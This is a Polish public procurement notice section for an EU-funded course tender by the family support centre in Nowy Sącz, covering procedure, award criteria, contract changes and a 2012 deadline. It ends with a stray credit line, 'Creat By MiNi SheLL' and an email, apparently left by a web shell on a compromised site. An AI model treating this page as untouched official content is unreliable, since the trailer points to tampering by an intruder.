<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą w szczególności terminu realizacji umowy 
w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, jak i dotyczyć mogą ustalenia ostatecznej wysokości należnego wynagrodzenia, 
w przypadku zmniejszenia liczby uczestników kursów w stosunku do zapisów specyfikacji. Dopuszczone zmiany umowy j.w., zostaną wprowadzone w drodze aneksu do umowy. 
Istotne zmiany postanowień umowy mogą także wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu
ul. Kilińskiego 72 A
33-300 Nowy Sącz
TEL: (18) 443 82 51
 FAX (18) 444 27 17
e-mail: pcprnskadry@op.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu, ul. Kilińskiego 72 A, 
33-300 Nowy Sącz, sekretariat pok. Nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach Projektu pn W stronę samodzielności i niezależności współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com